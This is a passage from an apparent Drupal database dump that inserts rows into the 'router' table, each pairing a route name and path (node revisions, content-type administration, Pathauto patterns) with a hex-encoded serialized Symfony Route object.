323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31323a222f6e6f64652f252f65646974223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.node.field_ui_fields', '/admin/structure/types/manage/{node_type}/fields', '/admin/structure/types/manage/%/fields', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a36323a225c44727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e6669674c697374436f6e74726f6c6c65723a3a6c697374696e67223b733a363a225f7469746c65223b733a31333a224d616e616765206669656c6473223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572206e6f6465206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36353a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f6669656c6473223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.node.preview', '/node/preview/{node_preview}/{view_mode_id}', '/node/preview/%/%', 12, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34333a222f6e6f64652f707265766965772f7b6e6f64655f707265766965777d2f7b766965775f6d6f64655f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f646550726576696577436f6e74726f6c6c65723a3a76696577223b733a31353a225f7469746c655f63616c6c6261636b223b733a35323a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f646550726576696577436f6e74726f6c6c65723a3a7469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32303a225f6e6f64655f707265766965775f616363657373223b733a31343a227b6e6f64655f707265766965777d223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226e6f64655f70726576696577223b613a323a7b733a343a2274797065223b733a31323a226e6f64655f70726576696577223b733a393a22636f6e766572746572223b733a34323a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6e6f64655f70726576696577223b7d7d733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32353a226163636573735f636865636b2e6e6f64652e70726576696577223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a226e6f64655f70726576696577223b693a313b733a31323a22766965775f6d6f64655f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37303a227b5e2f6e6f64652f707265766965772f283f503c6e6f64655f707265766965773e5b5e2f5d2b2b292f283f503c766965775f6d6f64655f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22766965775f6d6f64655f6964223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226e6f64655f70726576696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6e6f64652f70726576696577223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a226e6f64655f70726576696577223b693a313b733a31323a22766965775f6d6f64655f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31323b733a31343a227061747465726e4f75746c696e65223b733a31373a222f6e6f64652f707265766965772f252f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.node.revision', '/node/{node}/revisions/{node_revision}/view', '/node/%/revisions/%/view', 21, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34333a222f6e6f64652f7b6e6f64657d2f7265766973696f6e732f7b6e6f64655f7265766973696f6e7d2f76696577223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35323a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f6465436f6e74726f6c6c65723a3a7265766973696f6e53686f77223b733a31353a225f7469746c655f63616c6c6261636b223b733a35373a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f6465436f6e74726f6c6c65723a3a7265766973696f6e506167655469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32373a226e6f64655f7265766973696f6e2e76696577207265766973696f6e223b733a343a226e6f6465223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a31333a226e6f64655f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32303a22656e746974795f7265766973696f6e3a6e6f6465223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a31333a226e6f64655f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36373a227b5e2f6e6f64652f283f503c6e6f64653e5c642b292f7265766973696f6e732f283f503c6e6f64655f7265766973696f6e3e5b5e2f5d2b2b292f76696577247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f76696577223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a226e6f64655f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7265766973696f6e73223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a31333a226e6f64655f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32313b733a31343a227061747465726e4f75746c696e65223b733a32343a222f6e6f64652f252f7265766973696f6e732f252f76696577223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.node.version_history', '/node/{node}/revisions', '/node/%/revisions', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f6e6f64652f7b6e6f64657d2f7265766973696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a393a225265766973696f6e73223b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f6465436f6e74726f6c6c65723a3a7265766973696f6e4f76657276696577223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32333a226e6f64652e7669657720616c6c207265766973696f6e73223b733a343a226e6f6465223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a32313a225f6e6f64655f6f7065726174696f6e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f6e6f64652f283f503c6e6f64653e5c642b292f7265766973696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7265766973696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31373a222f6e6f64652f252f7265766973696f6e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.node_type.collection', '/admin/structure/types', '/admin/structure/types', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f7374727563747572652f7479706573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a393a226e6f64655f74797065223b733a363a225f7469746c65223b733a31333a22436f6e74656e74207479706573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6e74656e74207479706573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f7374727563747572652f7479706573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f7374727563747572652f7479706573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f7374727563747572652f7479706573223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.node_type.config_translation_overview', '/admin/structure/types/manage/{node_type}/translate', '/admin/structure/types/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35313a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a393a226e6f64655f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36383a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.node_type.delete_form', '/admin/structure/types/manage/{node_type}/delete', '/admin/structure/types/manage/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a226e6f64655f747970652e64656c657465223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31363a226e6f64655f747970652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36353a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.node_type.edit_form', '/admin/structure/types/manage/{node_type}', '/admin/structure/types/manage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31343a226e6f64655f747970652e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35343a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a7469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6e74656e74207479706573223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35383a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.node_type.entity_permissions_form', '/admin/structure/types/manage/{node_type}/permissions', '/admin/structure/types/manage/%/permissions', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f7065726d697373696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a363a225f7469746c65223b733a31383a224d616e616765207065726d697373696f6e73223b733a353a225f666f726d223b733a33383a2244727570616c5c757365725c466f726d5c456e746974795065726d697373696f6e73466f726d223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b733a31383a2262756e646c655f656e746974795f74797065223b733a393a226e6f64655f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572207065726d697373696f6e73223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a393a225f6669656c645f7569223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a333a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a32313a22776974685f636f6e6669675f6f7665727269646573223b623a313b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37303a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f7065726d697373696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31323a222f7065726d697373696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f7065726d697373696f6e73223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.pathauto_pattern.add_form', '/admin/config/search/path/patterns/add', '/admin/config/search/path/patterns/add', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33383a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31323a225f656e746974795f666f726d223b733a32343a22706174686175746f5f7061747465726e2e64656661756c74223b733a363a225f7469746c65223b733a32303a2241646420506174686175746f207061747465726e223b733a31323a2274656d7073746f72655f6964223b733a31363a22706174686175746f2e7061747465726e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a2261646d696e697374657220706174686175746f223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34353a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33383a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e